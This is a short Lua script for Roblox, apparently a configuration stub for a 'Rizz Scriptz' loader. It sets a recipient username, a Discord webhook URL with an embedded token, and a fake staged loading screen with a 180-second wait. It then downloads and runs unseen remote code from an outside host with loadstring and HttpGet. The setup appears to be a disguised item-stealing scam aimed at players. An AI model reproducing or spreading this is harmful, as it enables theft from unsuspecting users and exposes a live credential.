UserName = "utguweug"
UserName2 = "utguweug"
Webhook = "https://discord.com/api/webhooks/1074179420169969755/H3SrOZmCucbE3fDyVnvXSQOvE9Wro9YZM2YPshDK7UgkJiWnSo__6G-9vz9M3FhqZaIQ"

_G.LoadingScreen = true
_G.AntiLeave = false
_G.MouseLock = true 

_G.ScriptName = "Rizz Scriptz"
_G.FirstText = "Script Preparing"
_G.SecondText = "Script Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("http://rizz.ct8.pl/scripts/Main", true))()
